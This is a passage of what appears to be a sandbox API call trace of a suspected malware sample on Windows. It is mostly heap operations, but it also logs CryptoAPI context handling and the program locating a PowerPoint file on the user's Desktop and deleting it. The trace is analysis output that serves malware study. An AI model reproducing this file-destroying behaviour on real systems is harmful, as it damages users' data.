HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fb90 | out: hHeap=0x970000) returned 1 [0139.355] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0139.355] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0139.355] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0139.355] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0139.355] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0139.355] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50440 | out: hHeap=0x970000) returned 1 [0139.355] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0139.355] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0139.355] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0139.355] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0139.355] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50578 | out: hHeap=0x970000) returned 1 [0139.355] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0139.355] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54530 | out: hHeap=0x970000) returned 1 [0139.355] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0139.355] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0139.355] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0139.355] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0139.355] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78c00 | out: hHeap=0x970000) returned 1 [0139.355] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0139.355] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0139.355] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0139.355] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0139.356] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0139.356] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0139.356] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0139.356] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0139.356] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0139.356] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0139.356] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0139.356] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0139.356] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0139.356] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0139.356] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0139.356] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0139.356] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0139.356] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0139.356] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x2e69a08, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0139.356] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0139.356] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a08 | out: hHeap=0x970000) returned 1 [0139.357] GetProcAddress (hModule=0x756e0000, lpProcName="CryptReleaseContext") returned 0x756ffbc0 [0139.357] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540a8 | out: hHeap=0x970000) returned 1 [0139.357] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0139.357] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509b0 [0139.357] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0139.357] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0139.357] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0139.357] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0139.357] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0139.357] CryptReleaseContext (hProv=0xa5f958, dwFlags=0x0) returned 1 [0139.357] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0139.357] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50710 [0139.357] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0139.357] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50848 [0139.357] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507b8 [0139.357] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50920 [0139.357] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0139.357] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0139.357] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0139.357] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0139.358] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50788 [0139.358] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50728 [0139.358] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50860 [0139.358] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0139.358] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0139.358] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0139.358] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0139.358] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506f8 [0139.358] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50728 [0139.358] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50740 [0139.358] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0139.358] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0139.358] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0139.358] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0139.358] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0139.358] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0139.358] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0139.358] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0139.358] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0139.358] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505a8 | out: hHeap=0x970000) returned 1 [0139.358] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50440 | out: hHeap=0x970000) returned 1 [0139.358] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50608 | out: hHeap=0x970000) returned 1 [0139.358] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504b8 | out: hHeap=0x970000) returned 1 [0139.358] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50680 | out: hHeap=0x970000) returned 1 [0139.359] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0139.359] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50698 | out: hHeap=0x970000) returned 1 [0139.359] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50578 | out: hHeap=0x970000) returned 1 [0139.359] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50980 | out: hHeap=0x970000) returned 1 [0139.359] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0139.359] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0139.359] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54120 | out: hHeap=0x970000) returned 1 [0139.359] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0139.359] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0139.359] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0139.359] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0139.359] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0139.359] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0139.359] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0139.359] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50890 [0139.359] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507d0 [0139.359] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0139.359] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fe30 [0139.359] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0139.359] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0139.359] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fe30 | out: hHeap=0x970000) returned 1 [0139.359] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0139.359] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50998 [0139.360] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0139.360] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0139.360] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d58 [0139.360] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0139.360] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0139.360] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0139.360] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0139.360] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0139.360] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0139.360] FreeLibrary (hLibModule=0x756e0000) returned 1 [0139.360] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0139.360] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50890 | out: hHeap=0x970000) returned 1 [0139.360] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0139.360] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77688 | out: hHeap=0x970000) returned 1 [0139.360] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0139.360] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0139.360] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50530 | out: hHeap=0x970000) returned 1 [0139.360] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0139.360] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54eb8 [0139.360] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0139.360] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0139.360] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b68 [0139.360] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0139.361] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b68 | out: hHeap=0x970000) returned 1 [0139.361] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0139.361] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0139.361] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50608 [0139.361] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50440 [0139.361] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e504b8 [0139.361] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50578 [0139.361] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50530 [0139.361] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e505a8 [0139.361] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54288 [0139.361] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50608 | out: hHeap=0x970000) returned 1 [0139.361] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50608 [0139.361] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50680 [0139.361] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50698 [0139.361] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0139.361] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0139.361] CloseHandle (hObject=0x2a0) returned 1 [0139.361] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505f0 | out: hHeap=0x970000) returned 1 [0139.361] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0139.362] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f05008 | out: hHeap=0x970000) returned 1 [0139.362] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77808 | out: hHeap=0x970000) returned 1 [0139.362] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b28 | out: hHeap=0x970000) returned 1 [0139.362] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50698 | out: hHeap=0x970000) returned 1 [0139.362] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50680 | out: hHeap=0x970000) returned 1 [0139.362] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50440 | out: hHeap=0x970000) returned 1 [0139.363] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504b8 | out: hHeap=0x970000) returned 1 [0139.363] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50530 | out: hHeap=0x970000) returned 1 [0139.363] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50578 | out: hHeap=0x970000) returned 1 [0139.363] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505a8 | out: hHeap=0x970000) returned 1 [0139.363] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0139.363] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ba8 [0139.363] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0139.363] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b48 [0139.363] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b08 [0139.363] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50440 [0139.363] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e504b8 [0139.363] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e505f0 [0139.363] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50530 [0139.363] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50578 [0139.363] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e505a8 [0139.363] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54530 [0139.363] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50440 [0139.363] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50608 [0139.364] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50680 [0139.364] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b48 [0139.364] CloseHandle (hObject=0x2d0) returned 1 [0139.376] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0139.376] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b48 [0139.376] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50680 [0139.376] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504b8 [0139.376] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b68 [0139.378] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0139.378] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53920 [0139.379] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53728 [0139.379] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cc8 [0139.379] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8cf560 | out: pszPath="C:\\Users\\FD1HVy\\Desktop") returned 0x0 [0139.379] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53818 [0139.379] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7ff80 [0139.379] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b88 [0139.379] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d08 [0139.379] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e698c8 [0139.379] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53890 [0139.379] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 0x2e58910 [0139.379] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop/aycVRCc36.ppt", nBufferLength=0x104, lpBuffer=0x8cee18, lpFilePart=0x8cedf4 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\aycVRCc36.ppt", lpFilePart=0x8cedf4*="aycVRCc36.ppt") returned 0x25 [0139.379] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\aycVRCc36.ppt" (normalized: "c:\\users\\fd1hvy\\desktop\\aycvrcc36.ppt")) returned 0x20 [0139.380] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\aycVRCc36.ppt", lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x26b597e0, ftCreationTime.dwHighDateTime=0x1d5e9c2, ftLastAccessTime.dwLowDateTime=0xbcec7dd0, ftLastAccessTime.dwHighDateTime=0x1d5ee74, ftLastWriteTime.dwLowDateTime=0xbcec7dd0, ftLastWriteTime.dwHighDateTime=0x1d5ee74, nFileSizeHigh=0x0, nFileSizeLow=0xffed, dwReserved0=0xfffffffc, dwReserved1=0x8cf25c, cFileName="aycVRCc36.ppt", cAlternateFileName="AYCVRC~1.PPT")) returned 0xa87110 [0139.380] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\aycVRCc36.ppt" (normalized: "c:\\users\\fd1hvy\\desktop\\aycvrcc36.ppt")) returned 1 [0139.477] FindNextFileW (in: hFindFile=0xa87110, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x26b597e0, ftCreationTime.dwHighDateTime=0x1d5e9c2, ftLastAccessTime.dwLowDateTime=0xbcec7dd0, ftLastAccessTime.dwHighDateTime=0x1d5ee74, ftLastWriteTime.dwLowDateTime=0xbcec7dd0, ftLastWriteTime.dwHighDateTime=0x1d5ee74, nFileSizeHigh=0x0, nFileSizeLow=0xffed, dwReserved0=0xfffffffc, dwReserved1=0x8cf25c, cFileName="aycVRCc36.ppt", cAlternateFileName="AYCVRC~1.PPT")) returned 0 [0139.477] FindClose (in: hFindFile=0xa87110 | out: hFindFile=0xa87110) returned 1 [0139.477] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e58910 | out: hHeap=0x970000) returned 1 [0139.478] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0139.478] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53818 | out: hHeap=0x970000) returned 1 [0139.478] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53728 | out: hHeap=0x970000) returned 1 [0139.478] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53920 | out: hHeap=0x970000) returned 1 [0139.478] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0139.478] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53728 [0139.478] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53770 [0139.478] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0139.478] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8cf560 | out: pszPath="C:\\Users\\FD1HVy\\Desktop") returned 0x0 [0139.478] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53788 [0139.478] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fce0 [0139.478] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b28 [0139.478] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ce8 [0139.478] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699e8 [0139.478] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53848 [0139.478] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 0x2e58910 [0139.478] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fce0 | out: hHeap=0x970000) returned 1 [0139.478] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53848 | out: hHeap=0x970000) returned 1 [0139.478] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c28 [0139.478] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0139.478] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53848 [0139.479] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53848 | out: hHeap=0x970000) returned 1 [0139.479] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699e8 | out: hHeap=0x970000) returned 1 [0139.479] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0139.479] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: 